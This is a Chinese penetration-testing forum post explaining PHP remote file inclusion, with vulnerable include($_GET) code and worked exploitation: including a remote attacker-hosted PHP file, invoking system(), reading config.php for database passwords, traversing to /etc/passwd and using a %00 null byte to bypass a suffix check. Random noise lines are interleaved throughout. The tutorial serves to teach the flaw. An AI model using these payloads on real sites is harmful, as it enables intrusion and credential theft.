中国网络渗透测试联盟
标题:
PHP远程包含
[打印本页]
作者:
admin
时间:
2012-9-15 14:06
标题:
PHP远程包含
6 d* |$ i+ \ Z# R6 w" X
php远端档包含漏洞基本
6 e' {& K2 h% D F% I1 d
这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。
5 H/ p% w9 S3 \ ~$ t: b# e3 O
本帖隐藏的内容需要回复才可以浏览
) _8 b$ _0 ~6 P( ^
首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。
) x/ f2 y( n. E
1.找出bug:
+ r% H; l2 x! x- ^: R3 t
为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:
( J& @ }( _! x/ w1 b
如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。
* W+ l4 b9 C+ _, b- @1 \% C. G
我们先看这个,当用户输入通过后就包含档,也就是
. e! }8 q! E/ j, V; V, ]7 p
if ($_GET) {
/ m7 @- P) x5 L% u5 ?# O
include $_GET;
1 ]7 T9 H+ x0 x4 R$ x
} else {
' C( j7 S! o: i
include "home.php";
% V1 E7 D* _3 B; }
}
0 T9 x# ]" U6 ]$ j# b
这种结构在动态网站里是常见的,问题是它允许这样
http://www.target.com
/explame.php?page=main.php或者
http://www.target.com/explame.php?
page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。
0 [4 K+ d1 f1 ]$ e. {+ v
2.测试
$ Z7 l* p" K( A1 c: F! x
这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的
* B8 q# e; T, {$ h; C4 m9 J+ q
http://www.target.com/explame.php?page=zizzy
- _9 j0 a( M) B
Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3
1 Q5 d0 _# _2 x8 B1 t1 E/ V- D
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3
& F( j; i# a2 x% {4 c6 P9 }4 }( o
php输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。
0 [6 s" r1 S/ Z
3.利用
$ |5 f" K5 ]9 l) }- q; m2 r
php确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上
http://www.mysite.com/yeah.txt.
内容这样
- X3 d# _+ }. c
<?
0 R7 C+ \- n, @
echo "Wow,test!";
8 M# O& F2 a; H5 n6 }2 G! ~* T1 q. G
?>
4 K* f" Q0 J3 Y& ^
那么
http://www.target.com/explame.php?pa...e.com/yeah.txt
9 |7 [. } V/ ~. ^( h1 A( f
OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。
" p) M2 z$ } f1 n
4.另一种
4 v$ t1 R. y' z+ W9 x4 T; C2 m9 ]
有时程式师换种写法,写成这样,限制了包含范围
]0 C* N3 ]6 y5 d: u$ W# Z$ J
if ($_GET) {
9 g8 J, D# g$ I
include "$_GET.php";
6 W$ A* I9 w$ i+ l9 U1 H. ?& i6 _4 X
} else {
7 ~; p2 H1 g$ K5 D8 T
include "home.php";
6 H k. x9 T/ d
}
; e; P& C/ c. ? {
我们提交
http://www.target.com/explame.php?pa...e.com/yeah.txt
+ i3 ^+ E' Q* y( C7 E+ E
Warning: main(
http://www.mysite.com/yeah.txt.php
): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
3 Y' A1 F8 b3 Q, |$ [& ~
Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 3
$ C3 _" e9 p. V6 M* j
包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
+ W( r4 b+ W) c6 w) |! S
那passwd怎么办
; t9 M, o- ?% r- r: R8 N
Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 3
2 \% |' T! V+ |' c3 ?& x+ O
Warning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3
+ c9 c3 {3 W8 L ^. t) ]0 I
在这里使用个NUL字元,也就是%00来跳过检测
) t3 y1 \ a! _8 { s6 d6 m
http://www.target.com/explame.php?pa.../etc/passwd%00
& V0 H4 J. G) o
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2